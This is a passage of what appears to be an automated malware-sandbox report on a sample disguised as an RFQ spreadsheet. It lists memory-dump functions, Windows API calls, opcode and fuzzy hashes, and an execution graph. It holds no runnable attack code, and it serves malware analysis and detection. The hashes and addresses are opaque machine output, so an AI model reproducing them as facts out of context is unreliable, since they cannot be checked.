                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 8bd4fdee317894256eb663e570a5492c86552271c8d71599857df0181ab94002
                                              • Instruction ID: 4e523f5244eb071236fe57ff65edfb98ea1751020f7cbc3aff5a9edac896feb1
                                              • Opcode Fuzzy Hash: 8bd4fdee317894256eb663e570a5492c86552271c8d71599857df0181ab94002
                                              • Instruction Fuzzy Hash: CA21D4B5900249AFDB10CF9AD984ADEBBF4EB48324F14841AE918A3351D375A954CFA4
                                              Function 00E9D5C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 846 e9d5c8-e9d65c DuplicateHandle 847 e9d65e-e9d664 846->847 848 e9d665-e9d682 846->848 847->848
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D64F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 2e5b63d85ca43cf3d1723166f6bba44c0ce271bdbdf0dadc271b4de1aafcc51f
                                              • Instruction ID: f0ab7a675020c5a080f7f3e0e8b0a807a84f8fb5bb0ad28e72976c58eebebc22
                                              • Opcode Fuzzy Hash: 2e5b63d85ca43cf3d1723166f6bba44c0ce271bdbdf0dadc271b4de1aafcc51f
                                              • Instruction Fuzzy Hash: E321E4B59002099FDB10CF9AD984ADEBBF8EB48310F14841AE918A3310D374A940CFA4
                                              Function 00E9AD9C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9B3B9,00000800,00000000,00000000), ref: 00E9B5CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 120d1921a650479741d7164f6f3be77663ddc230eecc4317930eef44485d1ef7
                                              • Instruction ID: 645481822fb51f789c0ee8c84519ef61f8f049659fc8d270da31bf73dcd879a2
                                              • Opcode Fuzzy Hash: 120d1921a650479741d7164f6f3be77663ddc230eecc4317930eef44485d1ef7
                                              • Instruction Fuzzy Hash: 471114B69002099FDB10CF9AD944ADEFBF5EB88310F15842AD919B7200C375A944CFA4
                                              Function 00E9B558 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E9B3B9,00000800,00000000,00000000), ref: 00E9B5CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: dc7d89b91a6b3a529d23a4e2e1f3744ff12d7ff865d7ec25ade3bbfb930aa07d
                                              • Instruction ID: 791ca50f2b5c19372f3f30dafae25bba6571041e36bc03601d33742542171bfc
                                              • Opcode Fuzzy Hash: dc7d89b91a6b3a529d23a4e2e1f3744ff12d7ff865d7ec25ade3bbfb930aa07d
                                              • Instruction Fuzzy Hash: AB1112B6D002098FDB14CF9AD984A9EFBF5EB88314F14842AD959B7240C375A945CFA4
                                              Function 048C4490 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048C44F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b12e338c88bda23cdf64bf5b33be00d473aefda17f74f9e7b2ffdf5df8ce83c0
                                              • Instruction ID: f00cac6911b29f4152e442b024890721eabc38650f7c59a086ccd5a4cf750031
                                              • Opcode Fuzzy Hash: b12e338c88bda23cdf64bf5b33be00d473aefda17f74f9e7b2ffdf5df8ce83c0
                                              • Instruction Fuzzy Hash: 2411B3B5900249DFDB20DF99D985BDEBBF8EB48324F108819E559A7201C375A944CFA1
                                              Function 048C26F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 048C44F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 9ef9247c7add059706d4da9e65ec915f875ffdb296c5129a9c5ea79c68682e60
                                              • Instruction ID: 4c25e8b5f911ae3a49aeba324289eaf331a24fd4e101692e916cb06e59bc06e8
                                              • Opcode Fuzzy Hash: 9ef9247c7add059706d4da9e65ec915f875ffdb296c5129a9c5ea79c68682e60
                                              • Instruction Fuzzy Hash: C011F5B5800349DFDB20DF99D884BDEBBF8EB58314F108819E919A7310C375A944CFA1
                                              Function 00E9B2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B33E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 79f788925e74fbf4faa0d879b26c66eb602dbc17c720c84e9b65f81e994ab95e
                                              • Instruction ID: 45378ca55d27b4c9778d0ffc5f3974ce52fd08117382b01330820ed211b97c23
                                              • Opcode Fuzzy Hash: 79f788925e74fbf4faa0d879b26c66eb602dbc17c720c84e9b65f81e994ab95e
                                              • Instruction Fuzzy Hash: 7511E0B6D002499FDB20CF9AD944ADEFBF4EB88324F14841AD919B7210C3B5A945CFA1
                                              Function 00E4D034 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dad595b66b0f97ec5634cf8218799b53ec7ed81acc18429b821a27fb6f1ad5bc
                                              • Instruction ID: 2b43a1f742ccd203e6c879d9b3c7c6156f28142def4b26d40367c33713d9da2d
                                              • Opcode Fuzzy Hash: dad595b66b0f97ec5634cf8218799b53ec7ed81acc18429b821a27fb6f1ad5bc
                                              • Instruction Fuzzy Hash: 6C31AD7554D3808FD703DF20ED94755BFB2EF56314F1885EAC8859B2A3C23A980ACB62
                                              Function 00E4D055 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0bdf1b9cc3056967e3bb33f4c78a1d20d91ed2e588d82896587bff25e244001a
                                              • Instruction ID: 119a3271765d02762f2921db17d245a079305c2278cf9114105ea408dff3e03e
                                              • Opcode Fuzzy Hash: 0bdf1b9cc3056967e3bb33f4c78a1d20d91ed2e588d82896587bff25e244001a
                                              • Instruction Fuzzy Hash: 2921AD7554D3808FDB02CF20E994755BF71EB56314F28C5EAD8499B2A7C33A980ACB62
                                              Function 00E4D294 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91da4ef24c43da74def9e25dd95c8272cdfba0ce44129f1d9e7d4ae3075cabaf
                                              • Instruction ID: 542e19aea238f4f6710cf86126a1449f76c78fda8681ce521bf78ee67bc9e6fa
                                              • Opcode Fuzzy Hash: 91da4ef24c43da74def9e25dd95c8272cdfba0ce44129f1d9e7d4ae3075cabaf
                                              • Instruction Fuzzy Hash: 3A212975608204DFCB05DF14EDC0B26BBA5FB84718F24C56DD8095B356C37AD806CA62
                                              Function 00E4D0DC Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c0c3e729d1b508514601dcf56bf60ff87d039a93c920571e0185fd118b70623
                                              • Instruction ID: c6a9139e725eceddafae35970c7943440201b25b47bb12d0d0a51e655f391b6a
                                              • Opcode Fuzzy Hash: 3c0c3e729d1b508514601dcf56bf60ff87d039a93c920571e0185fd118b70623
                                              • Instruction Fuzzy Hash: 5621F275508204DFDB05DF14ED84B26BB65EB88328F24C5ADED095B396C33AD846CA61
                                              Function 00E4D28F Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063223758.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e4d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction ID: 65439257b7b6308d8fe2c57072f4eac91e99a7525afd8c151d254fe3be171d4e
                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction Fuzzy Hash: A7119D75508280DFDB16CF14E9C4B15BFB1FB84318F24C6ADD8495B656C33AD84ACB62

                                              Non-executed Functions

                                              Function 06BF2DD8 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4|hq$4|hq
                                              • API String ID: 0-2328431178
                                              • Opcode ID: bc1196e2bc3ba47090db0cf20ea3ae70121358a6bd8f3e40974addd452caa3ea
                                              • Instruction ID: 416ccd3cda586b1a03970d8fa73e4d6d26e7865e8de39f85f83dc4ac33519a7b
                                              • Opcode Fuzzy Hash: bc1196e2bc3ba47090db0cf20ea3ae70121358a6bd8f3e40974addd452caa3ea
                                              • Instruction Fuzzy Hash: 01C1F7B5B201118FCB99CF68C494A2ABBE2EF85300B6594E9D9059B371CB31DE85CBD1
                                              Function 048C58F8 Relevance: .4, Instructions: 377COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21669340570315192a329d2b449118f4cea902eb0359602f97afb90fec2fa98c
                                              • Instruction ID: be8d8ad981154ccb8f0468f9019e9b09a2b530d522219dd3114462aafab1c910
                                              • Opcode Fuzzy Hash: 21669340570315192a329d2b449118f4cea902eb0359602f97afb90fec2fa98c
                                              • Instruction Fuzzy Hash: B7D198717017209FDB29DB7AC450B6EB7E6AF88704F188A6DD146DB291CB35F801CB92
                                              Function 06BFE570 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90c10a785bfc9fb844f0a0868f2042b2aff5d922e4e12ad83b8c72bdc5e0b993
                                              • Instruction ID: bdb0aa93d0d7f37886a211e70c9593961a28f990faf1d5774f0c5856f4d2396c
                                              • Opcode Fuzzy Hash: 90c10a785bfc9fb844f0a0868f2042b2aff5d922e4e12ad83b8c72bdc5e0b993
                                              • Instruction Fuzzy Hash: 4FE12EB4E101599FCB54DF98C5809AEFBB2FF88304F248199E519A7366D730A946CF60
                                              Function 06BFE138 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a32dcea5473c320d99a403872147e5de491cc1982e3e03de99fd923892639c1c
                                              • Instruction ID: b96bf05d053e98ae726b2a27e805adef09ce0ec5165110d481fe4a2b139c6837
                                              • Opcode Fuzzy Hash: a32dcea5473c320d99a403872147e5de491cc1982e3e03de99fd923892639c1c
                                              • Instruction Fuzzy Hash: CFE12CB4E101199FCB14DFA8C5849AEFBF2FF88304F2491A9D519A7366D730A946CF60
                                              Function 06BFDD00 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e134e31057b25a1e92e6f2cd5c8f781485f7d23f2c5833d59a7743c2d1cb669
                                              • Instruction ID: c23daf1841ac8d7e8ae6fff51a5a02f3ce27a03739826d896c4d2578de62fac8
                                              • Opcode Fuzzy Hash: 8e134e31057b25a1e92e6f2cd5c8f781485f7d23f2c5833d59a7743c2d1cb669
                                              • Instruction Fuzzy Hash: 13E13DB4E101198FDB14DFA9C5809AEFBF2FF89304F2481A9D519A7366D730A942CF60
                                              Function 06BFF810 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45a4c31d7d28fc7ae7f8d0402e630ac18962f1d255ba7e31eb40f93f10c5772e
                                              • Instruction ID: 9b40047858e05a65d702cc58bbea6eb96546cfe62c41a86754711cfc59e39ab5
                                              • Opcode Fuzzy Hash: 45a4c31d7d28fc7ae7f8d0402e630ac18962f1d255ba7e31eb40f93f10c5772e
                                              • Instruction Fuzzy Hash: CEE13AB4E101198FCB14DFA9C5809AEFBF2FF89304F2495A9D519AB366D730A941CF60
                                              Function 00E9DE8C Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2063433699.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e90000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13d789fe16c75c5fc62cc02159a3db25612eb24de7956a99564a5c5f8d171fee
                                              • Instruction ID: 818a6f8e2ed27e70b69a93c6377991d5935922e505aaf0081a150cbe87481796
                                              • Opcode Fuzzy Hash: 13d789fe16c75c5fc62cc02159a3db25612eb24de7956a99564a5c5f8d171fee
                                              • Instruction Fuzzy Hash: 4CA15B32E102198FCF05DFA5C94459EB7B2FF85304B15957AE806BB265DB31ED46CB80
                                              Function 06BF7AC8 Relevance: .2, Instructions: 160COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8a01be868d91e4bf2181c51fd984f203ca4d3a8d57cfca1970e09a54935f0d1
                                              • Instruction ID: acc31e68f8d48da27bcf90770eda6fb30413fcbefab1d291468b7368d64bf5b9
                                              • Opcode Fuzzy Hash: f8a01be868d91e4bf2181c51fd984f203ca4d3a8d57cfca1970e09a54935f0d1
                                              • Instruction Fuzzy Hash: FA61E2B4E051098FCB44DFA9D5809AEFBF2FF88300F24D5A9D519A7315DB30A946CB90
                                              Function 06BF7AB9 Relevance: .1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78178a197f679a21cad13a858b570070a2073e152a6089c7842db8a814bfdab9
                                              • Instruction ID: 1b28cfcc527e73d75a22f844ca1506625217e97f34fcdc2adf45e7668e6554b7
                                              • Opcode Fuzzy Hash: 78178a197f679a21cad13a858b570070a2073e152a6089c7842db8a814bfdab9
                                              • Instruction Fuzzy Hash: 8241E474E015089FDB48DFAAD980AAEFBF2EFC8310F14C169D418A7365DB349946CB90
                                              Function 06BF521F Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2069384005.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6bf0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 467121cc26a0dd4434cef52463f0335f839a00cbd632fb91913617bba1596af1
                                              • Instruction ID: 707ff755fcf879aee7741e665a35df9228df408eaf2ee2946f5a8050dddb24c4
                                              • Opcode Fuzzy Hash: 467121cc26a0dd4434cef52463f0335f839a00cbd632fb91913617bba1596af1
                                              • Instruction Fuzzy Hash: 2F41A9B1E046188BEB28CF6BD8407CABBF7AFC9300F14D1AAD509A7225DB3059858F51
                                              Function 048C3350 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2065694997.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_48c0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48a1a0374cf04033d2b39a2c1cf2034995cb0c70b56677c6476e85c627cd5010
                                              • Instruction ID: 72ca93c8b127da8242becd1708c158833b0904f9cd55f288da468187f353c960
                                              • Opcode Fuzzy Hash: 48a1a0374cf04033d2b39a2c1cf2034995cb0c70b56677c6476e85c627cd5010
                                              • Instruction Fuzzy Hash: 9421DA71E056288BEB18CF6B88047DEFAF7AFC9300F04C5BAC80DA6255DB345986CE51

                                              Execution Graph

                                              Execution Coverage:9.3%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:73
                                              Total number of Limit Nodes:9
                                              execution_graph 45708 681c2d0 45709 681c2e0 45708->45709 45711 681c330 45709->45711 45712 681aadc 45709->45712 45711->45711 45713 681aae7 45712->45713 45717 71c0918 45713->45717 45722 71c0928 45713->45722 45714 681c3d9 45714->45711 45718 71c0928 45717->45718 45719 71c0965 45718->45719 45728 71c0b90 45718->45728 45733 71c0ba0 45718->45733 45719->45714 45724 71c0959 45722->45724 45725 71c09a5 45722->45725 45723 71c0965 45723->45714 45724->45723 45726 71c0b90 LoadLibraryExW 45724->45726 45727 71c0ba0 LoadLibraryExW 45724->45727 45725->45714 45726->45725 45727->45725 45729 71c0ba0 45728->45729 45737 71c0bd0 45729->45737 45744 71c0be0 45729->45744 45730 71c0baa 45730->45719 45735 71c0bd0 LoadLibraryExW 45733->45735 45736 71c0be0 LoadLibraryExW 45733->45736 45734 71c0baa 45734->45719 45735->45734 45736->45734 45738 71c0be0 45737->45738 45740 71c0c14 45738->45740 45742 71c0bd0 LoadLibraryExW 45738->45742 45743 71c0be0 LoadLibraryExW 45738->45743 45739 71c0c0c 45739->45740 45751 71c0558 45739->45751 45740->45730 45742->45739 45743->45739 45745 71c0bf1 45744->45745 45747 71c0c14 45744->45747 45745->45747 45749 71c0bd0 LoadLibraryExW 45745->45749 45750 71c0be0 LoadLibraryExW 45745->45750 45746 71c0c0c 45746->45747 45748 71c0558 LoadLibraryExW 45746->45748 45747->45730 45748->45747 45749->45746 45750->45746 45752 71c0e30 LoadLibraryExW 45751->45752 45754 71c0ea9 45752->45754 45754->45740 45666 14f0848 45667 14f084e 45666->45667 45668 14f091b 45667->45668 45671 14f133f 45667->45671 45676 14f1457 45667->45676 45672 14f12ce 45671->45672 45673 14f1343 45671->45673 45672->45667 45673->45672 45674 14f1457 3 API calls 45673->45674 45682 14f7128 45673->45682 45674->45673 45678 14f1463 45676->45678 45679 14f1356 45676->45679 45677 14f1454 45677->45667 45678->45667 45679->45677 45680 14f1457 3 API calls 45679->45680 45681 14f7128 3 API calls 45679->45681 45680->45679 45681->45679 45684 14f7132 45682->45684 45683 14f7174 45683->45673 45684->45683 45690 66dd2a0 45684->45690 45695 66dd2b0 45684->45695 45685 14f7145 45700 66de248 45685->45700 45704 66de258 45685->45704 45692 66dd2c5 45690->45692 45691 66dd4da 45691->45685 45692->45691 45693 66dd4f0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45692->45693 45694 66dd500 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45692->45694 45693->45692 45694->45692 45697 66dd2c5 45695->45697 45696 66dd4da 45696->45685 45697->45696 45698 66dd4f0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45697->45698 45699 66dd500 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45697->45699 45698->45697 45699->45697 45703 66de272 45700->45703 45701 66de4b9 45701->45683 45702 66dd500 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45702->45703 45703->45701 45703->45702 45705 66de272 45704->45705 45706 66de4b9 45705->45706 45707 66dd500 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 45705->45707 45706->45683 45707->45705

                                              Executed Functions

                                              Function 014F9BE0 Relevance: 3.1, Instructions: 3075COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17c2cb497e53914948d3d35d39f2f0bbef91603ce1714042ad4c05517c67d85e
                                              • Instruction ID: 7c84901616e735bfcc96ebd449d14dcc1b327c3fd8d23f17ad6305e438f62dcd
                                              • Opcode Fuzzy Hash: 17c2cb497e53914948d3d35d39f2f0bbef91603ce1714042ad4c05517c67d85e
                                              • Instruction Fuzzy Hash: 85631C31D10B1A8ECB51EF68C8805A9F7B1FF99300F15C79AE55877221EB70AAD5CB81
                                              Function 014FCE60 Relevance: 2.3, Instructions: 2299COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cda34cdb024ce7ec1f293077ec51c08b4aba910fc7d2a512e2019b22886fc478
                                              • Instruction ID: d35affb160c6369c93fdfd272a897f124f2f2e681769e7161e9aaddf9f367c54
                                              • Opcode Fuzzy Hash: cda34cdb024ce7ec1f293077ec51c08b4aba910fc7d2a512e2019b22886fc478
                                              • Instruction Fuzzy Hash: 7A331F31D107198EDB11EF68C8846AEF7B1FF99300F15C79AE558A7221EB70AAC5CB41
                                              Function 014F9420 Relevance: .5, Instructions: 541COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0561eb10a050f16d31f62adba82d97c5c27a026e7ce6f8a196345521da52a02e
                                              • Instruction ID: 3a60d288c22c9e6bad28688903ef0b07b0dc90ef78cb346b0c0004211c6fdc3c
                                              • Opcode Fuzzy Hash: 0561eb10a050f16d31f62adba82d97c5c27a026e7ce6f8a196345521da52a02e
                                              • Instruction Fuzzy Hash: 5B126D74A002058FDB15DF69D584BAEBBB2FF88314F14856AEA09DB3A5DB34DC42CB50
                                              Function 014F4A68 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee1b405ad1bec60c80875efc179d5281c767a3281732864f343604880b6827b2
                                              • Instruction ID: b75174a5a2f9b170282b6ac850effee883b70bd224eab56d45ca0b13d0cd0ea4
                                              • Opcode Fuzzy Hash: ee1b405ad1bec60c80875efc179d5281c767a3281732864f343604880b6827b2
